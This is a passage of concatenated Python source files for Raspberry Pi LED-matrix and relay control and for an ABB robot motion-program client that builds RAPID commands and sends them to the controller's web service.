logging.info('Device ID: {}'.format(Settings._device_id))
Settings._use_working_hours = self.get_config_value(_config, 'use_working_hours', False)
logging.debug('Use Working Hours: {}'.format(Settings._use_working_hours))
if Settings._use_working_hours:
# if working hours are enabled, that's the only time we need...
# convert the time string to a time value
Settings._work_start = datetime.datetime.strptime(
self.get_config_value(_config, 'work_start', "8:00"), '%H:%M').time()
Settings._work_end = datetime.datetime.strptime(
self.get_config_value(_config, 'work_end', "17:30"), '%H:%M').time()
logging.info('Work Start: {}'.format(Settings._work_start))
logging.info('Work End: {}'.format(Settings._work_end))
else:
logging.info('Using existing Settings class')
@staticmethod
def get_instance():
if Settings.__instance is None:
Settings()
return Settings.__instance
@staticmethod
def validate_config_options():
# list config options, especially missing ones
global _config
# don't do anything if we don't have a config file read
assert _config is not None, CONFIG_ERROR
# Returns a list of missing attributes for the object
# These logging statements are info because debug won't be set until after
# the app validates the config file
logging.info('Validating configuration file')
        res = []
        for val in CONFIG_PROPERTIES:
            try:
                prop = _config[val]
                logging.info("Config: {}: {}".format(val, prop))
            except KeyError:
                logging.error("Config: {}: MISSING".format(val))
                res.append(val)
        # return the list of missing properties (an empty list means the config file is complete)
        return res
@staticmethod
def get_config_value(config_object, key, default_value):
logging.info('get_config_value(_config, {}, {})'.format(key, default_value))
        try:
            value = config_object[key]
            # only treat a missing, null, or empty value as unset; an explicit False is a valid setting
            if value is not None and value != '':
                return value
            return default_value
        except KeyError:
            return default_value
@staticmethod
def get_access_token():
assert Settings._use_remote_notify is True, "Remote Notify disabled"
return Settings._access_token
@staticmethod
def get_busy_only():
return Settings._busy_only
@staticmethod
def get_debug_mode():
return Settings._debug_mode
@staticmethod
def get_device_id():
assert Settings._use_remote_notify is True, "Remote Notify disabled"
return Settings._device_id
@staticmethod
def get_display_meeting_summary():
return Settings._display_meeting_summary
@staticmethod
def get_ignore_in_summary():
return Settings._ignore_in_summary
@staticmethod
def get_reminder_only():
return Settings._reminder_only
@staticmethod
def get_use_reboot_counter():
return Settings._use_reboot_counter
@staticmethod
def get_reboot_counter_limit():
assert Settings._use_reboot_counter is True, "Reboot counter disabled"
return Settings._reboot_counter_limit
@staticmethod
def get_use_remote_notify():
return Settings._use_remote_notify
@staticmethod
def get_use_working_hours():
return Settings._use_working_hours
@staticmethod
def get_work_start():
assert Settings._use_working_hours is True, "Working hours disabled"
return Settings._work_start
@staticmethod
def get_work_end():
assert Settings._use_working_hours is True, "Working hours disabled"
return Settings._work_end
```
#### File: johnwargo/pi-remind-hd-notify/unicorn_hat.py
```python
import math
import time
import unicornhathd
# =======================================================================================
# Borrowed from: https://github.com/pimoroni/unicorn-hat-hd/blob/master/examples/text.py
# =======================================================================================
try:
from PIL import Image, ImageDraw, ImageFont
except ImportError:
exit("This script requires the pillow module\nInstall with: sudo pip install pillow")
# =======================================================================================
# COLORS
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
ORANGE = (255, 153, 0)
WHITE = (255, 255, 255)
YELLOW = (255, 255, 0)
BLACK = (0, 0, 0)
# constants used in the app to display status
CHECKING_COLOR = BLUE
SUCCESS_COLOR = GREEN
FAILURE_COLOR = RED
current_activity_light = 0
indicator_row = 0
u_height = 0
u_width = 0
def init():
global current_activity_light, indicator_row, u_height, u_width
# Clear the display (just in case)
unicornhathd.clear()
# Initialize all LEDs to black
unicornhathd.set_all(0, 0, 0)
# set the display orientation to zero degrees
unicornhathd.rotation(90)
# set u_width and u_height with the appropriate parameters for the HAT
u_width, u_height = unicornhathd.get_shape()
# calculate where we want to put the indicator light
indicator_row = u_height - 1
    # The app flashes a GREEN light in the indicator row every time it connects to Google to check the calendar.
    # The lit LED moves one position along the row on each check, then wraps around to the other end.
    # The current_activity_light variable keeps track of which light lit last. It starts at the display width
    # and is decremented (with wraparound) each time an activity light is shown.
current_activity_light = u_width
# Set a specific brightness level for the Pimoroni Unicorn HAT, otherwise it's pretty bright.
# Comment out the line below to see what the default looks like.
unicornhathd.brightness(0.5)
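# Illustrative call sequence from a host application (sketch only; the real app's startup code may differ):
#   import unicorn_hat as lights
#   lights.init()                            # must run once before any other call
#   lights.flash_all(2, 0.25, lights.GREEN)  # two quick green flashes
#   lights.display_text('Pi Remind', lights.BLUE)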
def display_text(message, color=WHITE):
# Use `fc-list` to show a list of installed fonts on your system,
# or `ls /usr/share/fonts/` and explore.
FONT = ('/usr/share/fonts/truetype/roboto/Roboto-Bold.ttf', 10)
global u_height, u_width
# do we have a message?
if len(message) > 0:
# then display it
# code borrowed from: https://github.com/pimoroni/unicorn-hat-hd/blob/master/examples/text.py
text_x = u_width
text_y = 2
font_file, font_size = FONT
font = ImageFont.truetype(font_file, font_size)
# =====================================================================
        # This block (adapted from the Pimoroni example) builds an off-screen image that is wider than the
        # message itself: the text plus blank margins on both sides, so the message can scroll fully onto
        # and off of the display.
# =====================================================================
text_width, text_height = u_width, 0
w, h = font.getsize(message)
text_width += w + u_width
text_height = max(text_height, h)
text_width += u_width + text_x + 1
image = Image.new("RGB", (text_width, max(16, text_height)), (0, 0, 0))
draw = ImageDraw.Draw(image)
offset_left = 0
draw.text((text_x + offset_left, text_y), message, color, font=font)
offset_left += font.getsize(message)[0] + u_width
for scroll in range(text_width - u_width):
for x in range(u_width):
for y in range(u_height):
pixel = image.getpixel((x + scroll, y))
r, g, b = [int(n) for n in pixel]
unicornhathd.set_pixel(u_width - 1 - x, y, r, g, b)
unicornhathd.show()
time.sleep(0.01)
unicornhathd.off()
# =====================================================================
def swirl(x, y, step):
global u_height, u_width
# modified from: https://github.com/pimoroni/unicorn-hat-hd/blob/master/examples/demo.py
x -= (u_width / 2)
y -= (u_height / 2)
dist = math.sqrt(pow(x, 2) + pow(y, 2)) / 2.0
angle = (step / 10.0) + (dist * 1.5)
s = math.sin(angle)
c = math.cos(angle)
xs = x * c - y * s
ys = x * s + y * c
r = abs(xs + ys)
r = r * 12.0
r -= 20
return r, r + (s * 130), r + (c * 130)
def do_swirl(duration):
# modified from: https://github.com/pimoroni/unicorn-hat-hd/blob/master/examples/demo.py
step = 0
for i in range(duration):
for y in range(u_height):
for x in range(u_width):
r, g, b = swirl(x, y, step)
r = int(max(0, min(255, r)))
g = int(max(0, min(255, g)))
b = int(max(0, min(255, b)))
unicornhathd.set_pixel(x, y, r, g, b)
step += 2
unicornhathd.show()
time.sleep(0.01)
# turn off all lights when you're done
unicornhathd.off()
def set_activity_light(color, increment):
    # used to turn on one LED at a time across the bottom row of lights. The app uses this as an unobtrusive
    # indicator when it connects to Google to check the calendar. It's intended as a subtle reminder that
    # things are still working.
global current_activity_light
# turn off (clear) any lights that are on
unicornhathd.off()
if increment:
# OK. Which light will we be illuminating?
if current_activity_light < 1:
# start over at the beginning when you're at the end of the row
current_activity_light = u_width
# increment the current light (to the next one)
current_activity_light -= 1
# set the pixel color
unicornhathd.set_pixel(current_activity_light, indicator_row, *color)
# show the pixel
unicornhathd.show()
def set_all(color):
unicornhathd.set_all(*color)
unicornhathd.show()
def flash_all(flash_count, delay, color):
    # light all of the LEDs in a single RGB color. Repeat 'flash_count' times,
    # keeping the LEDs illuminated (then off) for 'delay' seconds each cycle
for index in range(flash_count):
# fill the light buffer with the specified color
unicornhathd.set_all(*color)
# show the color
unicornhathd.show()
# wait a bit
time.sleep(delay)
# turn everything off
unicornhathd.off()
# wait a bit more
time.sleep(delay)
def flash_random(flash_count, delay, between_delay=0):
# Copied from https://github.com/pimoroni/unicorn-hat-hd/blob/master/examples/test.py
for index in range(flash_count):
# fill the light buffer with random colors
unicornhathd._buf = unicornhathd.numpy.random.randint(low=0, high=255, size=(16, 16, 3))
# show the colors
unicornhathd.show()
# wait a bit
time.sleep(delay)
# turn everything off
unicornhathd.off()
# do we have a between_delay value??
if between_delay > 0:
# wait a bit more
time.sleep(between_delay)
def off():
unicornhathd.off()
``` |
{
"source": "johnwargo/raspberry-pi-relay-controller-seeed",
"score": 3
} |
#### File: johnwargo/raspberry-pi-relay-controller-seeed/relay_lib_seeed.py
```python
from __future__ import print_function
import smbus
# The number of relay ports on the relay board.
# This value should never change!
NUM_RELAY_PORTS = 4
# Change the following value if your Relay board uses a different I2C address.
DEVICE_ADDRESS = 0x20 # 7 bit address (will be left shifted to add the read write bit)
# Don't change the values, there's no need for that.
DEVICE_REG_MODE1 = 0x06
DEVICE_REG_DATA = 0xff
bus = smbus.SMBus(1) # 0 = /dev/i2c-0 (port I2C0), 1 = /dev/i2c-1 (port I2C1)
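# The register is active low: a 0 bit switches a relay ON and a 1 bit switches it OFF, so 0xff means
# "all relays off". Worked example (illustrative): turning relay 1 on clears bit 0,
#   0xff & ~(0x1 << 0) == 0xfe
# and turning it off again sets bit 0,
#   0xfe | (0x1 << 0) == 0xff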
def relay_on(relay_num):
"""Turn the specified relay (by relay #) on.
Call this function to turn a single relay on.
Args:
relay_num (int): The relay number that you want turned on.
"""
global DEVICE_ADDRESS
global DEVICE_REG_DATA
global DEVICE_REG_MODE1
if isinstance(relay_num, int):
# do we have a valid relay number?
if 0 < relay_num <= NUM_RELAY_PORTS:
print('Turning relay', relay_num, 'ON')
DEVICE_REG_DATA &= ~(0x1 << (relay_num - 1))
bus.write_byte_data(DEVICE_ADDRESS, DEVICE_REG_MODE1, DEVICE_REG_DATA)
else:
print('Invalid relay #:', relay_num)
else:
print('Relay number must be an Integer value')
def relay_off(relay_num):
"""Turn the specified relay (by relay #) off.
Call this function to turn a single relay off.
Args:
relay_num (int): The relay number that you want turned off.
"""
global DEVICE_ADDRESS
global DEVICE_REG_DATA
global DEVICE_REG_MODE1
if isinstance(relay_num, int):
# do we have a valid relay number?
if 0 < relay_num <= NUM_RELAY_PORTS:
print('Turning relay', relay_num, 'OFF')
DEVICE_REG_DATA |= (0x1 << (relay_num - 1))
bus.write_byte_data(DEVICE_ADDRESS, DEVICE_REG_MODE1, DEVICE_REG_DATA)
else:
print('Invalid relay #:', relay_num)
else:
print('Relay number must be an Integer value')
def relay_all_on():
"""Turn all of the relays on.
Call this function to turn all of the relays on.
"""
global DEVICE_ADDRESS
global DEVICE_REG_DATA
global DEVICE_REG_MODE1
print('Turning all relays ON')
DEVICE_REG_DATA &= ~(0xf << 0)
bus.write_byte_data(DEVICE_ADDRESS, DEVICE_REG_MODE1, DEVICE_REG_DATA)
def relay_all_off():
"""Turn all of the relays on.
Call this function to turn all of the relays on.
"""
global DEVICE_ADDRESS
global DEVICE_REG_DATA
global DEVICE_REG_MODE1
print('Turning all relays OFF')
DEVICE_REG_DATA |= (0xf << 0)
bus.write_byte_data(DEVICE_ADDRESS, DEVICE_REG_MODE1, DEVICE_REG_DATA)
def relay_toggle_port(relay_num):
"""Toggle the specified relay (on to off, or off to on).
Call this function to toggle the status of a specific relay.
Args:
relay_num (int): The relay number to toggle.
"""
print('Toggling relay:', relay_num)
if relay_get_port_status(relay_num):
# it's on, so turn it off
relay_off(relay_num)
else:
# it's off, so turn it on
relay_on(relay_num)
def relay_get_port_status(relay_num):
"""Returns the status of the specified relay (True for on, False for off)
Call this function to retrieve the status of a specific relay.
Args:
relay_num (int): The relay number to query.
"""
# determines whether the specified port is ON/OFF
global DEVICE_REG_DATA
print('Checking status of relay', relay_num)
res = relay_get_port_data(relay_num)
if res > 0:
mask = 1 << (relay_num - 1)
# return the specified bit status
# return (DEVICE_REG_DATA & mask) != 0
return (DEVICE_REG_DATA & mask) == 0
else:
# otherwise (invalid port), always return False
print("Specified relay port is invalid")
return False
def relay_get_port_data(relay_num):
"""Internal function, used to retrieve binary data from the relay board.
Args:
relay_num (int): The relay port to query.
"""
# gets the current byte value stored in the relay board
global DEVICE_REG_DATA
print('Reading relay status value for relay', relay_num)
# do we have a valid port?
if 0 < relay_num <= NUM_RELAY_PORTS:
# read the memory location
DEVICE_REG_DATA = bus.read_byte_data(DEVICE_ADDRESS, DEVICE_REG_MODE1)
        # return the full status byte; the caller masks out the bit it needs
return DEVICE_REG_DATA
else:
# otherwise (invalid port), always return 0
print("Specified relay port is invalid")
return 0
``` |
{
"source": "johnwargo/raspberry-pi-relay-timer",
"score": 4
} |
#### File: johnwargo/raspberry-pi-relay-timer/relay.py
```python
import gpiozero
# used to track the current state of the relay. At the start, the
# application turns the relay off then sets this variable's value
# the application can then later query this to determine what the
# current state is for the relay, in the toggle function for example.
_relay_status = False
relay = None
def init(relay_pin):
# initialize the relay object
print("Initializing relay object")
global relay
relay = gpiozero.OutputDevice(relay_pin, active_high=True, initial_value=False)
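# Minimal usage sketch (the BCM pin number below is an example, not taken from this project):
#   import relay
#   relay.init(18)          # configure GPIO 18 as the relay output
#   relay.set_status(True)  # energize the relay
#   relay.toggle()          # and release it again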
def status():
return _relay_status
def set_status(the_status):
# sets the relay's status based on the boolean value passed to the function
# a value of True turns the relay on, a value of False turns the relay off
global _relay_status
global relay
if relay is not None:
_relay_status = the_status
if the_status:
print("Setting relay: ON")
relay.on()
else:
print("Setting relay: OFF")
relay.off()
else:
print("You must initialize the relay before you can use it")
def toggle():
# toggles the relay's status. If the relay is on, when you call this function,
# it will turn the relay off. If the relay is off, when you call this function,
# it will turn the relay on. Easy peasy, right?
global _relay_status
global relay
if relay is not None:
# flip our relay status value
_relay_status = not _relay_status
if _relay_status:
print("Toggling relay: ON")
else:
print("Toggling relay: OFF")
relay.toggle()
else:
print("You must initialize the relay before you can use it")
``` |
{
"source": "johnwargo/seeed-studio-relay-v2",
"score": 3
} |
#### File: johnwargo/seeed-studio-relay-v2/relay_lib_seeed_test_2.py
```python
import sys
import time
from seeed_relay_v1 import Relay
def process_loop():
# turn all of the relays on
relay.all_on()
relay.print_status_all()
# wait a second
time.sleep(1)
# turn all of the relays off
relay.all_off()
relay.print_status_all()
# wait a second
time.sleep(1)
# now cycle each relay every second in an infinite loop
while True:
# test the on/off methods
print('Testing on/off methods')
for i in range(1, 5):
relay.on(i)
relay.print_status_all()
time.sleep(1)
relay.off(i)
relay.print_status_all()
time.sleep(1)
# test the toggle method
print('Testing the toggle methods')
for i in range(1, 5):
relay.toggle_port(i)
relay.print_status_all()
time.sleep(1)
relay.toggle_port(i)
relay.print_status_all()
time.sleep(1)
print('Repeating loop')
# Now see what we're supposed to do next
if __name__ == "__main__":
# Create the relay object
relay = Relay()
try:
process_loop()
except KeyboardInterrupt:
print("\nExiting application")
# turn off all of the relays
relay.all_off()
# exit the application
sys.exit(0)
``` |
{
"source": "johnwason/abb_motion_program_exec",
"score": 2
} |
#### File: johnwason/abb_motion_program_exec/abb_motion_program_exec_client.py
```python
import re
from typing import Callable, NamedTuple, Any, List
import struct
import numpy as np
import io
import requests
from bs4 import BeautifulSoup
import time
import datetime
class speeddata(NamedTuple):
v_tcp: float
v_ori: float
v_leax: float
v_reax: float
v5 = speeddata(5,500,5000,1000)
v10 = speeddata(10,500,5000,1000)
v20 = speeddata(20,500,5000,1000)
v30 = speeddata(30,500,5000,1000)
v40 = speeddata(40,500,5000,1000)
v50 = speeddata(50,500,5000,1000)
v60 = speeddata(60,500,5000,1000)
v80 = speeddata(80,500,5000,1000)
v100 = speeddata(100,500,5000,1000)
v150 = speeddata(150,500,5000,1000)
v200 = speeddata(200,500,5000,1000)
v300 = speeddata(300,500,5000,1000)
v400 = speeddata(400,500,5000,1000)
v500 = speeddata(500,500,5000,1000)
v600 = speeddata(600,500,5000,1000)
v800 = speeddata(800,500,5000,1000)
v1000 = speeddata(1000,500,5000,1000)
v1500 = speeddata(1500,500,5000,1000)
v2000 = speeddata(2000,500,5000,1000)
v2500 = speeddata(2500,500,5000,1000)
v3000 = speeddata(3000,500,5000,1000)
v4000 = speeddata(4000,500,5000,1000)
v5000 = speeddata(5000,500,5000,1000)
v6000 = speeddata(6000,500,5000,1000)
v7000 = speeddata(7000,500,5000,1000)
vmax = speeddata(10000,500,5000,1000)
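# The names above mirror ABB RAPID's predefined speeddata records. If an intermediate speed is needed,
# a custom record can be built the same way (illustrative only):
#   v250 = speeddata(250, 500, 5000, 1000)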
class zonedata(NamedTuple):
finep: bool
pzone_tcp: float
pzone_ori: float
pzone_eax: float
zone_ori: float
zone_leax: float
zone_reax: float
fine = zonedata(True,0,0,0,0,0,0)
z0 = zonedata(False,0.3,0.3,0.3,0.03,0.3,0.03)
z1 = zonedata(False,1,1,1,0.1,1,0.1)
z5 = zonedata(False,5,8,8,0.8,8,0.8)
z10 = zonedata(False,10,15,15,1.5,15,1.5)
z15 = zonedata(False,15,23,23,2.3,23,2.3)
z20 = zonedata(False,20,30,30,3.0,30,3.0)
z30 = zonedata(False,30,45,45,4.5,45,4.5)
z40 = zonedata(False,40,60,60,6.0,60,6.0)
z50 = zonedata(False,50,75,75,7.5,75,7.5)
z60 = zonedata(False,60,90,90,9.0,90,9.0)
z80 = zonedata(False,80,120,120,12,120,12)
z100 = zonedata(False,100,150,150,15,150,15)
z150 = zonedata(False,150,225,225,23,225,23)
z200 = zonedata(False,200,300,300,30,300,30)
class jointtarget(NamedTuple):
robax: np.ndarray # shape=(6,)
extax: np.ndarray # shape=(6,)
class pose(NamedTuple):
trans: np.ndarray # [x,y,z]
rot: np.ndarray # [qw,qx,qy,qz]
class confdata(NamedTuple):
cf1: float
cf4: float
cf6: float
cfx: float
class robtarget(NamedTuple):
trans: np.ndarray # [x,y,z]
rot: np.ndarray # [qw,qx,qy,qz]
robconf: confdata #
extax: np.ndarray # shape=(6,)
class loaddata(NamedTuple):
mass: float
cog: np.ndarray # shape=(3,)
aom: np.ndarray # shape=(4,)
ix: float
iy: float
iz: float
class tooldata(NamedTuple):
robhold: bool
tframe: pose
tload : loaddata
_speeddata_struct_fmt = struct.Struct("<4f")
def _speeddata_to_bin(z: speeddata):
return _speeddata_struct_fmt.pack(
z.v_tcp, z.v_ori, z.v_leax, z.v_reax
)
_zonedata_struct_fmt = struct.Struct("<7f")
def _zonedata_to_bin(z: zonedata):
return _zonedata_struct_fmt.pack(
0.0 if not z.finep else 1.0,
z.pzone_tcp, z.pzone_ori, z.pzone_eax, z.zone_ori, z.zone_leax, z.zone_reax
)
def _fix_array(arr, l):
if isinstance(arr,list):
assert len(arr) == l, f"Invalid array, expected array length {l}"
return np.array(arr,dtype=np.float64)
if arr.shape == (l,):
return arr
if arr.shape == (l,1) or arr.shape == (1,l):
return arr.flatten()
assert False, f"Invalid array, expected array length {l}"
_jointtarget_struct_fmt = struct.Struct("<12f")
def _jointtarget_to_bin(j: jointtarget):
r = _fix_array(j.robax,6).tolist()
e = _fix_array(j.extax,6).tolist()
return _jointtarget_struct_fmt.pack(*r, *e)
_pose_struct_fmt = struct.Struct("<7f")
def _pose_to_bin(p: pose):
p1 = _fix_array(p.trans,3).tolist()
q = _fix_array(p.rot,4).tolist()
return _pose_struct_fmt.pack(*p1,*q)
_confdata_struct_fmt = struct.Struct("<4f")
def _confdata_to_bin(c: confdata):
return _confdata_struct_fmt.pack(c.cf1, c.cf4, c.cf6, c.cfx)
_robtarget_extax_struct_fmt = struct.Struct("<6f")
def _robtarget_to_bin(r: robtarget):
pose_bin = _pose_to_bin(pose(r.trans,r.rot))
robconf_bin = _confdata_to_bin(r.robconf)
extax = _fix_array(r.extax,6).tolist()
extax_bin = _robtarget_extax_struct_fmt.pack(*extax)
return pose_bin + robconf_bin + extax_bin
_num_struct_fmt = struct.Struct("<f")
def _num_to_bin(f):
return _num_struct_fmt.pack(f)
_loaddata_struct_fmt = struct.Struct("<11f")
def _loaddata_to_bin(l: loaddata):
cog = _fix_array(l.cog,3)
aom = _fix_array(l.aom,4)
return _loaddata_struct_fmt.pack(
l.mass, *cog, *aom, l.ix, l.iy, l.iz
)
def _tooldata_to_bin(td: tooldata):
robhold_bin = _num_to_bin(0.0 if not td.robhold else 1.0)
tframe_bin = _pose_to_bin(td.tframe)
tload_bin = _loaddata_to_bin(td.tload)
return robhold_bin + tframe_bin + tload_bin
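# Serialization note: every numeric field above is packed as a little-endian 32-bit float ("<f"),
# including command numbers and opcodes, and strings are written as a float length followed by ASCII
# bytes. The reader helpers below (and get_program_rapid) parse this same layout back out.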
def _read_num(f: io.IOBase):
b = f.read(4)
return _num_struct_fmt.unpack(b)[0]
def _read_nums(f: io.IOBase, n: int):
return [_read_num(f) for _ in range(n)]
def _read_struct_io(f: io.IOBase, s: struct.Struct):
return s.unpack(f.read(s.size))
def _nums_to_rapid_array(nums: List[float]):
return "[" + ", ".join([str(n) for n in nums]) + "]"
def _read_struct_io_to_rapid_array(f: io.IOBase, s: struct.Struct):
nums = _read_struct_io(f,s)
return _nums_to_rapid_array(nums)
def _speeddata_io_to_rapid(f: io.IOBase):
return _read_struct_io_to_rapid_array(f,_speeddata_struct_fmt)
def _zonedata_io_to_rapid(f: io.IOBase):
nums = list(_read_struct_io(f, _zonedata_struct_fmt))
nums[0] = "TRUE" if nums[0] != 0 else "FALSE"
return _nums_to_rapid_array(nums)
def _jointtarget_io_to_rapid(f: io.IOBase):
nums = _read_struct_io(f,_jointtarget_struct_fmt)
return f"[{_nums_to_rapid_array(nums[:6])},{_nums_to_rapid_array(nums[6:])}]"
def _pose_io_to_rapid(f: io.IOBase):
nums = _read_struct_io(f, _pose_struct_fmt)
return f"[{_nums_to_rapid_array(nums[:3])},{_nums_to_rapid_array(nums[3:])}]"
def _confdata_io_to_rapid(f: io.IOBase):
return _read_struct_io_to_rapid_array(f, _confdata_struct_fmt)
def _extax_io_to_rapid(f: io.IOBase):
return _read_struct_io_to_rapid_array(f, _robtarget_extax_struct_fmt)
def _robtarget_io_to_rapid(f: io.IOBase):
pose_nums = _read_struct_io(f,_pose_struct_fmt)
trans_str = _nums_to_rapid_array(pose_nums[:3])
rot_str = _nums_to_rapid_array(pose_nums[3:])
robconf_str = _confdata_io_to_rapid(f)
extax_str = _extax_io_to_rapid(f)
return f"[{trans_str},{rot_str},{robconf_str},{extax_str}]"
def _loaddata_io_to_rapid(f: io.IOBase):
nums = _read_struct_io(f, _loaddata_struct_fmt)
return f"[{nums[0]},{_nums_to_rapid_array(nums[1:4])},{_nums_to_rapid_array(nums[4:8])},{nums[8]},{nums[9]},{nums[10]}]"
def _tooldata_io_to_rapid(f: io.IOBase):
robhold_num = _read_num(f)
robhold_str = "TRUE" if robhold_num != 0 else "FALSE"
tframe_str = _pose_io_to_rapid(f)
tload_str = _loaddata_io_to_rapid(f)
return f"[{robhold_str},{tframe_str},{tload_str}]"
def _moveabsj_io_to_rapid(f: io.IOBase):
cmd_num = _read_num(f)
op = _read_num(f)
assert op == 0x1
to_joint_pos_str = _jointtarget_io_to_rapid(f)
speed_str = _speeddata_io_to_rapid(f)
zone_str = _zonedata_io_to_rapid(f)
return f"MoveAbsJ {to_joint_pos_str}, {speed_str}, {zone_str}, motion_program_tool;"
def _movej_io_to_rapid(f: io.IOBase):
cmd_num = _read_num(f)
op = _read_num(f)
assert op == 0x2
to_point_str = _robtarget_io_to_rapid(f)
speed_str = _speeddata_io_to_rapid(f)
zone_str = _zonedata_io_to_rapid(f)
return f"MoveJ {to_point_str}, {speed_str}, {zone_str}, motion_program_tool;"
def _movel_io_to_rapid(f: io.IOBase):
cmd_num = _read_num(f)
op = _read_num(f)
assert op == 0x3
to_point_str = _robtarget_io_to_rapid(f)
speed_str = _speeddata_io_to_rapid(f)
zone_str = _zonedata_io_to_rapid(f)
return f"MoveL {to_point_str}, {speed_str}, {zone_str}, motion_program_tool;"
def _movec_io_to_rapid(f: io.IOBase):
cmd_num = _read_num(f)
op = _read_num(f)
assert op == 0x4
cir_point_str = _robtarget_io_to_rapid(f)
to_point_str = _robtarget_io_to_rapid(f)
speed_str = _speeddata_io_to_rapid(f)
zone_str = _zonedata_io_to_rapid(f)
return f"MoveC {cir_point_str}, {to_point_str}, {speed_str}, {zone_str}, motion_program_tool;"
def _waittime_io_to_rapid(f: io.IOBase):
cmd_num = _read_num(f)
op = _read_num(f)
assert op == 0x5
t = _read_num(f)
return f"WaitTime {t};"
tool0 = tooldata(True,pose([0,0,0],[1,0,0,0]),loaddata(0.001,[0,0,0.001],[1,0,0,0],0,0,0))
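# tool0 above mirrors RAPID's default tool. A custom tool can be built the same way, for example a tool
# with an offset TCP and a small payload (values purely illustrative; they are passed straight through
# to RAPID, so RAPID's usual units apply):
#   my_tool = tooldata(True, pose([0, 0, 100], [1, 0, 0, 0]),
#                      loaddata(1.0, [0, 0, 50], [1, 0, 0, 0], 0, 0, 0))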
class MotionProgram:
def __init__(self,first_cmd_num: int=1, tool: tooldata = None, timestamp: str = None):
if timestamp is None:
timestamp = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S-%f")[:-2]
assert re.match(r"^\d{4}\-\d{2}\-\d{2}-\d{2}\-\d{2}\-\d{2}\-\d{4}$", timestamp)
self._timestamp = timestamp
self._f = io.BytesIO()
# Version number
self._f.write(_num_to_bin(10003))
if tool is None:
tool = tool0
self._f.write(_tooldata_to_bin(tool))
timestamp_ascii = timestamp.encode("ascii")
self._f.write(_num_to_bin(len(timestamp_ascii)))
self._f.write(timestamp_ascii)
self._cmd_num=first_cmd_num
def MoveAbsJ(self, to_joint_pos: jointtarget, speed: speeddata, zone: zonedata):
to_joint_pos_b = _jointtarget_to_bin(to_joint_pos)
speed_b = _speeddata_to_bin(speed)
zone_b = _zonedata_to_bin(zone)
self._f.write(_num_to_bin(self._cmd_num))
self._f.write(_num_to_bin(0x1))
self._f.write(to_joint_pos_b)
self._f.write(speed_b)
self._f.write(zone_b)
self._cmd_num+=1
def MoveJ(self, to_point: robtarget, speed: speeddata, zone: zonedata):
to_point_b = _robtarget_to_bin(to_point)
speed_b = _speeddata_to_bin(speed)
zone_b = _zonedata_to_bin(zone)
self._f.write(_num_to_bin(self._cmd_num))
self._f.write(_num_to_bin(0x2))
self._f.write(to_point_b)
self._f.write(speed_b)
self._f.write(zone_b)
self._cmd_num+=1
def MoveL(self, to_point: robtarget, speed: speeddata, zone: zonedata):
to_point_b = _robtarget_to_bin(to_point)
speed_b = _speeddata_to_bin(speed)
zone_b = _zonedata_to_bin(zone)
self._f.write(_num_to_bin(self._cmd_num))
self._f.write(_num_to_bin(0x3))
self._f.write(to_point_b)
self._f.write(speed_b)
self._f.write(zone_b)
self._cmd_num+=1
def MoveC(self, cir_point: robtarget, to_point: robtarget, speed: speeddata, zone: zonedata):
cir_point_b = _robtarget_to_bin(cir_point)
to_point_b = _robtarget_to_bin(to_point)
speed_b = _speeddata_to_bin(speed)
zone_b = _zonedata_to_bin(zone)
self._f.write(_num_to_bin(self._cmd_num))
self._f.write(_num_to_bin(0x4))
self._f.write(cir_point_b)
self._f.write(to_point_b)
self._f.write(speed_b)
self._f.write(zone_b)
self._cmd_num+=1
def WaitTime(self, t: float):
assert t > 0, "Wait time must be >0"
self._f.write(_num_to_bin(self._cmd_num))
self._f.write(_num_to_bin(0x5))
self._f.write(_num_to_bin(t))
self._cmd_num+=1
def get_program_bytes(self):
return self._f.getvalue()
def get_program_rapid(self, module_name="motion_program_exec_gen"):
program_bytes = self.get_program_bytes()
f = io.BufferedReader(io.BytesIO(program_bytes))
o = io.StringIO()
ver = _read_num(f)
tooldata_str = _tooldata_io_to_rapid(f)
timestamp_ascii_len = int(_read_num(f))
timestamp_ascii = f.read(timestamp_ascii_len)
timestamp_str = timestamp_ascii.decode('ascii')
print(f"MODULE {module_name}", file=o)
print(f" ! abb_motion_program_exec format version {ver}", file=o)
print(f" ! abb_motion_program_exec timestamp {timestamp_str}", file=o)
print(f" PERS tooldata motion_program_tool := {tooldata_str};", file=o)
print(f" PROC main()", file=o)
while True:
nums_bytes = f.peek(8)
if len(nums_bytes) < 8:
break
op = _num_struct_fmt.unpack_from(nums_bytes, 4)[0]
cmd_num = _num_struct_fmt.unpack_from(nums_bytes, 0)[0]
print(f" ! cmd_num = {cmd_num}",file=o)
if op == 0x1:
print(f" {_moveabsj_io_to_rapid(f)}",file=o)
elif op == 0x2:
print(f" {_movej_io_to_rapid(f)}",file=o)
elif op == 0x3:
print(f" {_movel_io_to_rapid(f)}",file=o)
elif op == 0x4:
print(f" {_movec_io_to_rapid(f)}",file=o)
elif op == 0x5:
print(f" {_waittime_io_to_rapid(f)}",file=o)
else:
assert False, f"Invalid command opcode: {op}"
print(" ENDPROC", file=o)
print("ENDMODULE", file=o)
return o.getvalue()
def get_timestamp(self):
return self._timestamp
class MotionProgramExecClient:
def __init__(self, base_url='http://127.0.0.1:80', username='Default User', password='<PASSWORD>'):
self.base_url=base_url
self.auth=requests.auth.HTTPDigestAuth(username, password)
self._session=requests.Session()
def _do_get(self, relative_url):
url="/".join([self.base_url, relative_url])
res=self._session.get(url, auth=self.auth)
try:
return self._process_response(res)
finally:
res.close()
def _do_post(self, relative_url, payload=None):
url="/".join([self.base_url, relative_url])
res=self._session.post(url, data=payload, auth=self.auth)
try:
return self._process_response(res)
finally:
res.close()
def _process_response(self, response):
soup=BeautifulSoup(response.text, features="html.parser")
if (response.status_code == 500):
raise Exception("Robot returning 500 Internal Server Error")
if (response.status_code == 200 or response.status_code == 201 \
or response.status_code==202 or response.status_code==204):
return soup.body
if soup.body is None:
raise Exception("Robot returning HTTP error " + str(response.status_code))
error_code=int(soup.find('span', attrs={'class':'code'}).text)
error_message1=soup.find('span', attrs={'class': 'msg'})
if (error_message1 is not None):
error_message=error_message1.text
else:
error_message="Received error from ABB robot: " + str(error_code)
raise ABBException(error_message, error_code)
def start(self, cycle='asis',tasks=['T_ROB1']):
rob_tasks = self.get_tasks()
for t in tasks:
assert t in rob_tasks, f"Cannot start unknown task {t}"
for rob_task in rob_tasks.values():
if not rob_task.motiontask:
continue
if rob_task.name in tasks:
if not rob_task.active:
self.activate_task(rob_task.name)
else:
if rob_task.active:
self.deactivate_task(rob_task.name)
